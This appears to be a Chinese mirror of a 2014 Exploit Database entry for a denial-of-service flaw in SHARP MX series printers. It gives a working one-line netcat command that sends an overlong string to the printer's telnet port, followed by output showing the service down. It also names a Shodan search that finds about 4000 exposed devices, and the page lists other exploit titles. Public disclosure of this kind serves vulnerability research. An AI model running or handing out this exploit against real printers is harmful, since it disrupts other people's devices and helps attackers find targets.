SHARP MX Series – Denial of Service

Exploit Database
80 阅读

作者： pws

日期： 2014-08-09
类别：
- dos
平台：
- hardware
来源：https://www.exploit-db.com/exploits/34306/

# Exploit Title: SHARP MX Series - Denial Of Service
# Date: 08/08/2014
# Exploit Author: pws
# Vendor Homepage: Sharp Printers
# Firmware Link: Not found
# Tested on: Latest version
# Shodan d0rk: "SHARP Telnet server" ~4000 devices
# CVE : None yet

$ python -c 'print "A"*200 + "\n"' | nc 192.168.30.5 23

$ telnet 192.168.30.5 23
Trying 192.168.30.5 23...
telnet: Unable to connect to remote host: Connection refused

This vulnerability leads to a Denial of Service vulnerability. 

Unfortunately, we were unable to retrieve the core dumped but 
this flaw might result in a Buffer Overflow allowing remote command execution.

last Exploits
SHARP MX Series – Denial of Service的更多信息

Adobe Flash AS2 – textfield.filters Use-After-Free (2)：
Oracle VirtualBox Guest Additions 5.1.18 – Unprivileged Windows User-Mode Guest Code Double-Free：
Free Download Manager – Stack Buffer Overflow：
SuperScan 4.1 – Tools Hostname/IP/URL Field Buffer Overflow：
Zhone GPON 2520 R4.0.2.566b – Crash (PoC)：
GHIA CamIP 1.2 for iOS – ‘Password’ Denial of Service (PoC)：
EMC NetWorker 7.6 sp3 – Denial of Service：
Linux Kernel 3.10.0 (CentOS / RHEL 7.1) – ‘mct_u232’ Nullpointer Dereference：